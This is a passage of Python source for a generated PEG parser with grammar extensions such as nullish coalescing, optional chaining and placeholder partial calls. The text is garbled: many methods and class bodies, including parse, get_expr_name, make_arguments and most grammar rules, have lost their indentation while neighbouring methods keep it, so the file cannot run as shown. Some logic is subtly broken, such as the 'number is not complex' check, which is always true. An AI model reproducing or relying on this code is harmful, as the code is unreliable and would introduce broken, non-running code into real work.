    ast.FormattedValue: "f-string expression",
    ast.Compare: "comparison",
    ast.IfExp: "conditional expression",
    ast.NamedExpr: "named expression",
}
def parse_file(
    path: str,
    py_version: Optional[tuple]=None,
    token_stream_factory: Optional[
        Callable[[Callable[[], str]], Iterator[tokenize.TokenInfo]]
    ] = None,
    verbose:bool = False,
) -> ast.Module:
    """Parse a file and return its module AST.

    ``py_version`` caps the accepted syntax at that Python version;
    ``token_stream_factory`` may replace ``tokenize.generate_tokens`` as
    the token source; ``verbose`` enables parser tracing.
    """
    with open(path) as f:
        tok_stream = (
            token_stream_factory(f.readline)
            if token_stream_factory else
            tokenize.generate_tokens(f.readline)
        )
        tokenizer = Tokenizer(tok_stream, verbose=verbose, path=path)
        parser = PythonParser(
            tokenizer,
            verbose=verbose,
            filename=os.path.basename(path),
            py_version=py_version
        )
        # "file" is the grammar's start rule for a whole module.
        return parser.parse("file")
def parse_string(
    source: str,
    mode: Union[Literal["eval"], Literal["exec"]],
    py_version: Optional[tuple]=None,
    token_stream_factory: Optional[
        Callable[[Callable[[], str]], Iterator[tokenize.TokenInfo]]
    ] = None,
    verbose:bool = False,
) -> Any:
    """Parse a string and return its AST.

    ``mode`` selects the grammar start rule: "eval" parses a single
    expression, anything else parses a whole module ("file" rule).
    """
    tok_stream = (
        token_stream_factory(io.StringIO(source).readline)
        if token_stream_factory else
        tokenize.generate_tokens(io.StringIO(source).readline)
    )
    tokenizer = Tokenizer(tok_stream, verbose=verbose)
    parser = PythonParser(tokenizer, verbose=verbose, py_version=py_version)
    return parser.parse(mode if mode == "eval" else "file")
class Parser(Parser):
#: Name of the source file, used in error reports
filename : str
    def __init__(self,
        tokenizer: Tokenizer, *,
        verbose: bool = False,
        filename: str = "<unknown>",
        py_version: Optional[tuple] = None,
    ) -> None:
        """Create a parser over *tokenizer*.

        ``py_version`` is the maximum Python version whose syntax is
        accepted; it is capped at the running interpreter's version.
        """
        super().__init__(tokenizer, verbose=verbose)
        self.filename = filename
        # Never claim support for syntax newer than the interpreter itself.
        self.py_version = min(py_version, sys.version_info) if py_version else sys.version_info
        # Most specific syntax error recorded so far (raised by parse()).
        self._exception = None
def parse(self, rule: str) -> Optional[ast.AST]:
res = getattr(self, rule)()
if res is None:
if self._exception is not None:
raise self._exception
else:
raise SyntaxError("invalid syntax")
return res
    def check_version(self, min_version: Tuple[int, ...], error_msg: str, node: Node) -> Node:
        """Check that the python version is high enough for a rule to apply.

        Returns *node* unchanged when ``self.py_version`` meets
        *min_version*; raises SyntaxError otherwise.
        """
        if self.py_version >= min_version:
            return node
        else:
            raise SyntaxError(
                f"{error_msg} only supported in Python {min_version} and above."
            )
    def raise_indentation_error(self, msg) -> None:
        """Raise an indentation error with the given message."""
        raise IndentationError(msg)
def get_expr_name(self, node) -> str:
"""Get a descriptive name for an expression."""
# See https://github.com/python/cpython/blob/master/Parser/pegen.c#L161
assert node is not None
node_t = type(node)
if node_t is ast.Constant:
v = node.value
if v in (None, True, False, Ellipsis):
return str(v)
else:
return "literal"
try:
return EXPR_NAME_MAPPING[node_t]
except KeyError:
raise ValueError(
f"unexpected expression in assignment {type(node).__name__} "
f"(line {node.lineno})."
)
def set_expr_context(self, node, context):
"""Set the context (Load, Store, Del) of an ast node."""
node.ctx = context
return node
def ensure_real(self, number_str: str):
number = ast.literal_eval(number_str)
if number is not complex:
self.store_syntax_error("real number required in complex literal")
return number
def ensure_imaginary(self, number_str: str):
number = ast.literal_eval(number_str)
if number is not complex:
self.store_syntax_error("imaginary number required in complex literal")
return number
    def generate_ast_for_string(self, tokens):
        """Generate AST nodes for strings.

        Rebuilds a source snippet that preserves each token's original
        line/column position (so node locations in the resulting AST match
        the real input), wraps it in parentheses, and parses it.
        """
        err_msg = ''
        line = 1
        col_offset = 0
        source = ''
        for t in tokens:
            n_line = t.start[0] - line
            if n_line:
                col_offset = 0
            # Pad with newlines/spaces so the token lands at its original
            # (line, column) in the synthesized source.
            source += """
""" * n_line + ' ' * (t.start[1] - col_offset) + t.string
            line, col_offset = t.end
        if source[0] == ' ':
            source = '(' + source[1:]
        else:
            source = '(' + source
        source += ')'
        try:
            m = ast.parse(source)
        except SyntaxError as e:
            err_msg = e.args[0]
            # Identify the line at which the error occurred to get a more
            # accurate line number
            for t in tokens:
                try:
                    m = ast.parse(t.string)
                except SyntaxError:
                    break
        # Avoid getting a triple nesting in the error report that does not
        # bring anything relevant to the traceback.
        if err_msg:
            self.store_syntax_error_known_location(err_msg, t)
            raise self._exception
        return m.body[0].value
def extract_import_level(self, tokens: List[tokenize.TokenInfo]) -> int:
"""Extract the relative import level from the tokens preceding the module name.
'.' count for one and '...' for 3.
"""
level = 0
for t in tokens:
if t.string == ".":
level += 1
else:
level += 3
return level
    def set_decorators(self,
        target: FC,
        decorators: list
    ) -> FC:
        """Set the decorators on a function or class definition.

        Returns *target* for chaining.
        """
        target.decorator_list = decorators
        return target
def get_comparison_ops(self, pairs):
return [op for op, _ in pairs]
def get_comparators(self, pairs):
return [comp for _, comp in pairs]
def set_arg_type_comment(self, arg, type_comment):
if type_comment or sys.version_info < (3, 9):
arg.type_comment = type_comment
return arg
    def make_partial_function(self,
        func: ast.Name,
        arguments: Tuple[list, list],
        **locations,
    ) -> Union[ast.Lambda, ast.Call]:
        """Build a partial-application call from '?' placeholder arguments.

        ``arguments`` is a (positional, keyword) pair. Each "?" placeholder
        becomes a parameter ``_0, _1, ...`` of a wrapping lambda; every
        non-constant argument is hoisted into an outer lambda's parameters
        (``_p_0, ...``) so it is evaluated once, at partial-creation time.
        ``locations`` carries the lineno/col_offset keywords for every
        synthesized node.
        """
        args = list(arguments[0] if arguments else [])
        kwargs = list(arguments[1] if arguments else [])
        q_count = 0          # number of '?' placeholders seen so far
        bind_args = []       # non-constant positionals evaluated eagerly
        bind_kwargs = []     # non-constant keywords evaluated eagerly
        for i in range(len(args)):
            if args[i] == "?":
                args[i] = ast.Name(id=f"_{q_count}", ctx=Load, **locations)
                q_count += 1
            elif isinstance(args[i], ast.Starred) and args[i].value == "?":
                # '*?' forwards a placeholder as a star-arg.
                args[i] = ast.Starred(
                    value=ast.Name(id=f"_{q_count}", ctx=Load, **locations),
                    ctx=Load,
                    **locations,
                )
                q_count += 1
            elif isinstance(args[i], ast.Constant):
                # Constants are safe to re-evaluate; leave them inline.
                continue
            else:
                bind_args.append(args[i])
                args[i] = ast.Name(id=f"_p_{len(bind_args)-1}", ctx=Load, **locations)
        for i in range(len(kwargs)):
            if kwargs[i].value == "?":
                kwargs[i] = ast.keyword(
                    arg=kwargs[i].arg,
                    value=ast.Name(id=f"_{q_count}", ctx=Load, **locations),
                    **locations,
                )
                q_count += 1
            elif isinstance(kwargs[i].value, ast.Constant):
                continue
            else:
                bind_kwargs.append(kwargs[i])
                # The bound keyword is passed through under its own name.
                kwargs[i] = ast.keyword(
                    arg=kwargs[i].arg,
                    value=ast.Name(id=kwargs[i].arg, ctx=Load, **locations),
                    **locations,
                )
        # Innermost call: f(...) with placeholders/bound names substituted.
        result = ast.Call(func=ast.Name("f", ctx=Load, **locations), args=args, keywords=kwargs, **locations)
        if q_count > 0:
            # Placeholders become the parameters of an inner lambda.
            lambda_body = ast.Lambda(
                args=ast.arguments(
                    args=[ast.arg(arg=f"_{i}", **locations) for i in range(q_count)],
                    posonlyargs=[], kwonlyargs=[], defaults=[], vararg=None, kw_defaults=[], kwarg=None,
                    **locations,
                ),
                body=result,
                **locations,
            )
            # Outer immediately-invoked lambda binds eager arguments and
            # the target callable `f` once.
            result = ast.Call(
                func=ast.Lambda(
                    args=ast.arguments(
                        args=[ast.arg(arg=f"_p_{i}", **locations) for i in range(len(bind_args))]
                        + [ast.arg(arg="f", **locations)]
                        + [ast.arg(arg=bind_kwargs[i].arg, **locations) for i in range(len(bind_kwargs))],
                        posonlyargs=[], kwonlyargs=[], kw_defaults=[], defaults=[], vararg=None, kwarg=None,
                        **locations,
                    ),
                    body=lambda_body,
                    **locations,
                ),
                args=bind_args + [func],
                keywords=bind_kwargs,
                **locations,
            )
        return result
    def make_nullish_coalescing(self, array, **locations):
        """Build the AST for a nullish-coalescing chain (a ?? b ?? ...).

        Each operand in *array* is wrapped in a zero-argument lambda so it
        is evaluated lazily; the generated expression calls them in order
        and returns the first result that is not None.
        """
        length = len(array)
        # Start with the first operand's thunk call...
        body = ast.Call(func=ast.Name(id="arg0", ctx=Load, **locations), args=[], keywords=[], **locations)
        for i in range(1, length):
            # ...then fold each following operand into
            # (_i := <so-far>) if (_i is not None) else arg<i>()
            temporary = ast.NamedExpr(
                target=ast.Name(id=f'_{i}', ctx=Store, **locations),
                value=body, **locations
            )
            if_not_null = ast.Compare(
                left=temporary,
                ops=[ast.IsNot()],
                comparators=[ast.Constant(value=None, **locations)],
                **locations
            )
            body = ast.IfExp(
                body=ast.Name(id=f'_{i}', ctx=Load, **locations),
                test=if_not_null,
                orelse=ast.Call(func=ast.Name(id=f"arg{i}", ctx=Load, **locations), args=[], keywords=[], **locations),
                **locations
            )
        # Immediately-invoked lambda that receives one thunk per operand.
        return ast.Call(
            func=ast.Lambda(
                args=ast.arguments(
                    args=[ast.arg(arg=f"arg{i}", **locations) for i in range(length)],
                    posonlyargs=[], kwonlyargs=[], defaults=[], vararg=None, kw_defaults=[], kwarg=None,
                    **locations,
                ),
                body=body,
                **locations,
            ),
            args=[
                ast.Lambda(
                    args=ast.arguments(
                        args=[], posonlyargs=[], kwonlyargs=[], defaults=[], vararg=None, kw_defaults=[], kwarg=None,
                        **locations,
                    ),
                    body=item,
                    **locations,
                )
                for item in array
            ],
            keywords=[], **locations
        )
    def make_optional_chaining(self, left, node, **locations):
        """Build the AST for an optional-chaining access (``left?.attr`` style).

        Evaluates *left* once (via walrus into ``_``); yields None when the
        result is None, otherwise performs *node*'s access on it. The returned
        call is tagged with ``_is_optional_chaining`` so consecutive links can
        be collapsed into the previous wrapper's lambda body.
        """
        if isinstance(left, ast.Call) and getattr(left, "_is_optional_chaining", False):
            # Re-open a previous optional-chaining wrapper: chain off its body.
            left = left.func.body
        temporary = ast.NamedExpr(target=ast.Name(id='_', ctx=Store, **locations), value=left, **locations)
        # Deep-copy so rewriting the receiver does not mutate the caller's node.
        node = copy.deepcopy(node)
        if isinstance(node, ast.Call):
            node.func.value = ast.Name(id='_', ctx=Load, **locations)
        elif isinstance(node, ast.Attribute):
            node.value = ast.Name(id='_', ctx=Load, **locations)
        elif isinstance(node, ast.Subscript):
            node.value = ast.Name(id='_', ctx=Load, **locations)
        if_null = ast.Compare(left=temporary, ops=[ast.Is()], comparators=[ast.Constant(value=None, **locations)], **locations)
        body = ast.IfExp(body=ast.Constant(value=None, **locations), test=if_null, orelse=node, **locations)
        # Wrap in an immediately-called zero-argument lambda to scope '_'.
        result = ast.Call(
            func=ast.Lambda(
                args=ast.arguments(args=[], posonlyargs=[], kwonlyargs=[],
                    defaults=[], vararg=None, kw_defaults=[], kwarg=None,**locations,
                ),
                body=body, **locations,
            ),
            args=[], keywords=[], **locations
        )
        result._is_optional_chaining = True
        return result
    def unpack_mapping(self, left, right, **locations):
        """Build an Assign that destructures mapping *right* into the names in *left*.

        *left* is a sequence of NAME tokens; the produced code is equivalent to
        ``a, b = (lambda **kwargs: (kwargs.get('a'), kwargs.get('b')))(**right)``,
        so missing keys yield None rather than raising.
        """
        return ast.Assign(
            targets=[
                ast.Tuple(
                    elts=[
                        ast.Name(id=token_info.string, ctx=Store, **locations)
                        for token_info in left],
                    ctx=Store, **locations)
            ],
            value=ast.Call(
                func=ast.Lambda(
                    args=ast.arguments(
                        kwarg=ast.arg(arg="kwargs", **locations),
                        args=[], posonlyargs=[], kwonlyargs=[], kw_defaults=[], defaults=[], vararg=None,
                        **locations,
                    ),
                    # One kwargs.get('<name>') per target, in target order.
                    body=ast.Tuple(elts=[
                        ast.Call(
                            func=ast.Attribute(
                                value=ast.Name(id='kwargs', ctx=Load, **locations),
                                attr='get',
                                ctx=Load,
                                **locations
                            ),
                            args=[ast.Constant(value=token_info.string, **locations)],
                            keywords=[],
                            **locations,
                        )
                        for token_info in left], ctx=Load, **locations),
                    **locations,
                ),
                args=[],
                # keyword with no arg name == '**right' double-star expansion.
                keywords=[ast.keyword(value=right, **locations)],
                **locations,
            ),
            **locations,
        )
def make_arguments(self,
pos_only: Optional[List[Tuple[ast.arg, None]]],
pos_only_with_default: List[Tuple[ast.arg, Any]],
param_no_default: Optional[List[Tuple[ast.arg, None]]],
param_default: Optional[List[Tuple[ast.arg, Any]]],
after_star: Optional[Tuple[Optional[ast.arg], List[Tuple[ast.arg, Any]], Optional[ast.arg]]]
) -> ast.arguments:
"""Build a function definition arguments."""
defaults = (
[d for _, d in pos_only_with_default if d is not None]
if pos_only_with_default else
[]
)
defaults += (
[d for _, d in param_default if d is not None]
if param_default else
[]
)
pos_only = pos_only or pos_only_with_default
# Because we need to combine pos only with and without default even
# the version with no default is a tuple
pos_only = [p for p, _ in pos_only]
params = (param_no_default or []) + ([p for p, _ in param_default] if param_default else [])
# If after_star is None, make a default tuple
after_star = after_star or (None, [], None)
return ast.arguments(
posonlyargs=pos_only,
args=params,
defaults=defaults,
vararg=after_star[0],
kwonlyargs=[p for p, _ in after_star[1]],
kw_defaults=[d for _, d in after_star[1]],
kwarg=after_star[2]
)
    def _store_syntax_error(
        self,
        message: str,
        start: Optional[Tuple[int, int]] = None,
        end: Optional[Tuple[int, int]] = None
    ) -> None:
        """Store a SyntaxError for *message* in ``self._exception``.

        When *start*/*end* are omitted they are taken from the tokenizer's
        diagnostic token; the source text shown is the token's own line in
        that case, otherwise the joined lines spanning start..end.
        """
        # Only use the token's single line when the caller gave us no span at all.
        line_from_token = start is None and end is None
        if start is None or end is None:
            tok = self._tokenizer.diagnose()
            start = start or tok.start
            end = end or tok.end
        if line_from_token:
            line = tok.line
        else:
            # End is used only to get the proper text
            line = "\n".join(
                self._tokenizer.get_lines(list(range(start[0], end[0] + 1)))
            )
        # Stored, not raised: callers decide whether to raise (see raise_syntax_error).
        self._exception = SyntaxError(
            message,
            (self.filename, start[0], start[1], line)
        )
    def store_syntax_error(self, message: str) -> None:
        """Store a syntax error at the tokenizer's current diagnostic position."""
        self._store_syntax_error(message)
def make_syntax_error(self, message: str) -> None:
self._store_syntax_error(message)
return self._exception
def store_syntax_error_known_location(self, message: str, node) -> None:
"""Store a syntax error that occured at a given AST node."""
if isinstance(node, tokenize.TokenInfo):
start = node.start
end = node.end
else:
start = node.lineno, node.col_offset
end = node.end_lineno, node.end_col_offset
self._store_syntax_error(message, start, end)
def store_syntax_error_known_range(
self,
message: str,
start_node: Union[ast.AST, tokenize.TokenInfo],
end_node: Union[ast.AST, tokenize.TokenInfo]
) -> None:
if isinstance(start_node, tokenize.TokenInfo):
start = start_node.start
else:
start = start_node.lineno, start_node.col_offset
if isinstance(end_node, tokenize.TokenInfo):
end = end_node.end
else:
end = end_node.end_lineno, end_node.end_col_offset
self._store_syntax_error(message, start, end)
def store_syntax_error_starting_from(
self,
message: str,
start_node: Union[ast.AST, tokenize.TokenInfo]
) -> None:
if isinstance(start_node, tokenize.TokenInfo):
start = start_node.start
else:
start = start_node.lineno, start_node.col_offset
self._store_syntax_error(message, start, None)
    def raise_syntax_error(self, message: str) -> NoReturn:
        """Store and immediately raise a syntax error at the current position."""
        self._store_syntax_error(message)
        raise self._exception
    def raise_syntax_error_known_location(
        self,
        message: str,
        node: Union[ast.AST, tokenize.TokenInfo]
    ) -> NoReturn:
        """Raise a syntax error that occurred at a given token or AST node."""
        self.store_syntax_error_known_location(message, node)
        raise self._exception
    def raise_syntax_error_known_range(
        self,
        message: str,
        start_node: Union[ast.AST, tokenize.TokenInfo],
        end_node: Union[ast.AST, tokenize.TokenInfo]
    ) -> NoReturn:
        """Raise a syntax error spanning *start_node* through *end_node*."""
        self.store_syntax_error_known_range(message, start_node, end_node)
        raise self._exception
    def raise_syntax_error_starting_from(
        self,
        message: str,
        start_node: Union[ast.AST, tokenize.TokenInfo]
    ) -> NoReturn:
        """Raise a syntax error beginning at *start_node* with no explicit end."""
        self.store_syntax_error_starting_from(message, start_node)
        raise self._exception
# Keywords and soft keywords are listed at the end of the parser definition.
class PythonParser(Parser):
@memoize
def start(self) -> Optional[Any]:
# start: file
mark = self._mark()
if (
(file := self.file())
):
return file
self._reset(mark)
return None
@memoize
def file(self) -> Optional[ast . Module]:
# file: statements? $
mark = self._mark()
if (
(a := self.statements(),)
and
(_endmarker := self.expect('ENDMARKER'))
):
return ast . Module ( body = a or [] , type_ignores = [] )
self._reset(mark)
return None
@memoize
def interactive(self) -> Optional[ast . Interactive]:
# interactive: statement_newline
mark = self._mark()
if (
(a := self.statement_newline())
):
return ast . Interactive ( body = a )
self._reset(mark)
return None
@memoize
def eval(self) -> Optional[ast . Expression]:
# eval: expressions NEWLINE* $
mark = self._mark()
if (
(a := self.expressions())
and
(_loop0_1 := self._loop0_1(),)
and
(_endmarker := self.expect('ENDMARKER'))
):
return ast . Expression ( body = a )
self._reset(mark)
return None
@memoize
def func_type(self) -> Optional[ast . FunctionType]:
# func_type: '(' type_expressions? ')' '->' expression NEWLINE* $
mark = self._mark()
if (
(literal := self.expect('('))
and
(a := self.type_expressions(),)
and
(literal_1 := self.expect(')'))
and
(literal_2 := self.expect('->'))
and
(b := self.expression())
and
(_loop0_2 := self._loop0_2(),)
and
(_endmarker := self.expect('ENDMARKER'))
):
return ast . FunctionType ( argtypes = a , returns = b )
self._reset(mark)
return None
@memoize
def fstring(self) -> Optional[ast . Expr]:
# fstring: star_expressions
mark = self._mark()
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def statements(self) -> Optional[list]:
# statements: statement+
mark = self._mark()
if (
(a := self._loop1_3())
):
return list ( itertools . chain ( * a ) )
self._reset(mark)
return None
@memoize
def statement(self) -> Optional[list]:
# statement: compound_stmt | simple_stmts
mark = self._mark()
if (
(a := self.compound_stmt())
):
return [a]
self._reset(mark)
if (
(a := self.simple_stmts())
):
return a
self._reset(mark)
return None
    @memoize
    def statement_newline(self) -> Optional[list]:
        """Grammar rule — statement_newline: compound_stmt NEWLINE | simple_stmts | NEWLINE | $

        A bare NEWLINE produces a Pass statement spanning the blank line;
        end-of-file yields None.
        """
        # statement_newline: compound_stmt NEWLINE | simple_stmts | NEWLINE | $
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.compound_stmt())
            and
            (_newline := self.expect('NEWLINE'))
        ):
            return [a]
        self._reset(mark)
        if (
            (simple_stmts := self.simple_stmts())
        ):
            return simple_stmts
        self._reset(mark)
        if (
            (_newline := self.expect('NEWLINE'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return [ast . Pass ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
        self._reset(mark)
        if (
            (_endmarker := self.expect('ENDMARKER'))
        ):
            return None
        self._reset(mark)
        return None
@memoize
def simple_stmts(self) -> Optional[list]:
# simple_stmts: simple_stmt !';' NEWLINE | ';'.simple_stmt+ ';'? NEWLINE
mark = self._mark()
if (
(a := self.simple_stmt())
and
self.negative_lookahead(self.expect, ';')
and
(_newline := self.expect('NEWLINE'))
):
return [a]
self._reset(mark)
if (
(a := self._gather_4())
and
(opt := self.expect(';'),)
and
(_newline := self.expect('NEWLINE'))
):
return a
self._reset(mark)
return None
    @memoize
    def simple_stmt(self) -> Optional[Any]:
        """Grammar rule — simple_stmt, tried in declared order.

        Alternatives: assignment | star_expressions | return | import |
        raise | 'pass' | del | yield | assert | 'break' | 'continue' |
        global | nonlocal. Keyword-led alternatives are guarded by a
        positive lookahead before invoking the sub-rule.
        """
        # simple_stmt: assignment | star_expressions | &'return' return_stmt | &('import' | 'from') import_stmt | &'raise' raise_stmt | 'pass' | &'del' del_stmt | &'yield' yield_stmt | &'assert' assert_stmt | 'break' | 'continue' | &'global' global_stmt | &'nonlocal' nonlocal_stmt
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (assignment := self.assignment())
        ):
            return assignment
        self._reset(mark)
        if (
            (e := self.star_expressions())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Expr ( value = e , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'return')
            and
            (return_stmt := self.return_stmt())
        ):
            return return_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self._tmp_6, )
            and
            (import_stmt := self.import_stmt())
        ):
            return import_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'raise')
            and
            (raise_stmt := self.raise_stmt())
        ):
            return raise_stmt
        self._reset(mark)
        if (
            (literal := self.expect('pass'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Pass ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'del')
            and
            (del_stmt := self.del_stmt())
        ):
            return del_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'yield')
            and
            (yield_stmt := self.yield_stmt())
        ):
            return yield_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'assert')
            and
            (assert_stmt := self.assert_stmt())
        ):
            return assert_stmt
        self._reset(mark)
        if (
            (literal := self.expect('break'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Break ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (literal := self.expect('continue'))
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Continue ( lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'global')
            and
            (global_stmt := self.global_stmt())
        ):
            return global_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'nonlocal')
            and
            (nonlocal_stmt := self.nonlocal_stmt())
        ):
            return nonlocal_stmt
        self._reset(mark)
        return None
    @memoize
    def compound_stmt(self) -> Optional[Any]:
        """Grammar rule — compound_stmt, tried in declared order.

        Each alternative is guarded by a lookahead on its leading keyword
        (or keyword set via a _tmp_* helper); match_stmt is the unguarded
        fallback.
        """
        # compound_stmt: &('def' | '@' | 'async') function_def | &'if' if_stmt | &('class' | '@') class_def | &('with' | 'async') with_stmt | &('for' | 'async') for_stmt | &'try' try_stmt | &'while' while_stmt | match_stmt
        mark = self._mark()
        if (
            self.positive_lookahead(self._tmp_7, )
            and
            (function_def := self.function_def())
        ):
            return function_def
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'if')
            and
            (if_stmt := self.if_stmt())
        ):
            return if_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self._tmp_8, )
            and
            (class_def := self.class_def())
        ):
            return class_def
        self._reset(mark)
        if (
            self.positive_lookahead(self._tmp_9, )
            and
            (with_stmt := self.with_stmt())
        ):
            return with_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self._tmp_10, )
            and
            (for_stmt := self.for_stmt())
        ):
            return for_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'try')
            and
            (try_stmt := self.try_stmt())
        ):
            return try_stmt
        self._reset(mark)
        if (
            self.positive_lookahead(self.expect, 'while')
            and
            (while_stmt := self.while_stmt())
        ):
            return while_stmt
        self._reset(mark)
        if (
            (match_stmt := self.match_stmt())
        ):
            return match_stmt
        self._reset(mark)
        return None
    @memoize
    def assignment(self) -> Optional[Any]:
        """Grammar rule — assignment (annotated, mapping-unpack, plain, augmented).

        The augmented-assignment alternative uses a 'cut': once the target
        and operator have matched, failure of the RHS aborts the whole rule
        instead of falling through to invalid_assignment.
        """
        # assignment: NAME ':' expression ['=' annotated_rhs] | ('(' single_target ')' | single_subscript_attribute_target) ':' expression ['=' annotated_rhs] | '{' ','.NAME+ '}' '=' expression | ((star_targets '='))+ (yield_expr | star_expressions) !'=' TYPE_COMMENT? | single_target augassign ~ (yield_expr | star_expressions) | invalid_assignment
        mark = self._mark()
        tok = self._tokenizer.peek()
        start_lineno, start_col_offset = tok.start
        if (
            (a := self.name())
            and
            (literal := self.expect(':'))
            and
            (b := self.expression())
            and
            (c := self._tmp_11(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 6 ) , "Variable annotation syntax is" , ast . AnnAssign ( target = ast . Name ( id = a . string , ctx = Store , lineno = a . start [0] , col_offset = a . start [1] , end_lineno = a . end [0] , end_col_offset = a . end [1] , ) , annotation = b , value = c , simple = 1 , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
        self._reset(mark)
        if (
            (a := self._tmp_12())
            and
            (literal := self.expect(':'))
            and
            (b := self.expression())
            and
            (c := self._tmp_13(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . check_version ( ( 3 , 6 ) , "Variable annotation syntax is" , ast . AnnAssign ( target = a , annotation = b , value = c , simple = 0 , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
        self._reset(mark)
        if (
            (literal := self.expect('{'))
            and
            (a := self._gather_14())
            and
            (literal_1 := self.expect('}'))
            and
            (literal_2 := self.expect('='))
            and
            (b := self.expression())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return self . unpack_mapping ( a , b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if (
            (a := self._loop1_16())
            and
            (b := self._tmp_17())
            and
            self.negative_lookahead(self.expect, '=')
            and
            (tc := self.type_comment(),)
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . Assign ( targets = a , value = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        cut = False
        if (
            (a := self.single_target())
            and
            (b := self.augassign())
            and
            (cut := True)
            and
            (c := self._tmp_18())
        ):
            tok = self._tokenizer.get_last_non_whitespace_token()
            end_lineno, end_col_offset = tok.end
            return ast . AugAssign ( target = a , op = b , value = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
        self._reset(mark)
        if cut: return None
        if (
            (invalid_assignment := self.invalid_assignment())
        ):
            return None # pragma: no cover
        self._reset(mark)
        return None
@memoize
def annotated_rhs(self) -> Optional[Any]:
# annotated_rhs: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def augassign(self) -> Optional[Any]:
# augassign: '+=' | '-=' | '*=' | '@=' | '/=' | '%=' | '&=' | '|=' | '^=' | '<<=' | '>>=' | '**=' | '//='
mark = self._mark()
if (
(literal := self.expect('+='))
):
return ast . Add ( )
self._reset(mark)
if (
(literal := self.expect('-='))
):
return ast . Sub ( )
self._reset(mark)
if (
(literal := self.expect('*='))
):
return ast . Mult ( )
self._reset(mark)
if (
(literal := self.expect('@='))
):
return self . check_version ( ( 3 , 5 ) , "The '@' operator is" , ast . MatMult ( ) )
self._reset(mark)
if (
(literal := self.expect('/='))
):
return ast . Div ( )
self._reset(mark)
if (
(literal := self.expect('%='))
):
return ast . Mod ( )
self._reset(mark)
if (
(literal := self.expect('&='))
):
return ast . BitAnd ( )
self._reset(mark)
if (
(literal := self.expect('|='))
):
return ast . BitOr ( )
self._reset(mark)
if (
(literal := self.expect('^='))
):
return ast . BitXor ( )
self._reset(mark)
if (
(literal := self.expect('<<='))
):
return ast . LShift ( )
self._reset(mark)
if (
(literal := self.expect('>>='))
):
return ast . RShift ( )
self._reset(mark)
if (
(literal := self.expect('**='))
):
return ast . Pow ( )
self._reset(mark)
if (
(literal := self.expect('//='))
):
return ast . FloorDiv ( )
self._reset(mark)
return None
@memoize
def return_stmt(self) -> Optional[ast . Return]:
# return_stmt: 'return' star_expressions?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('return'))
and
(a := self.star_expressions(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Return ( value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def raise_stmt(self) -> Optional[ast . Raise]:
# raise_stmt: 'raise' expression ['from' expression] | 'raise'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('raise'))
and
(a := self.expression())
and
(b := self._tmp_19(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Raise ( exc = a , cause = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('raise'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
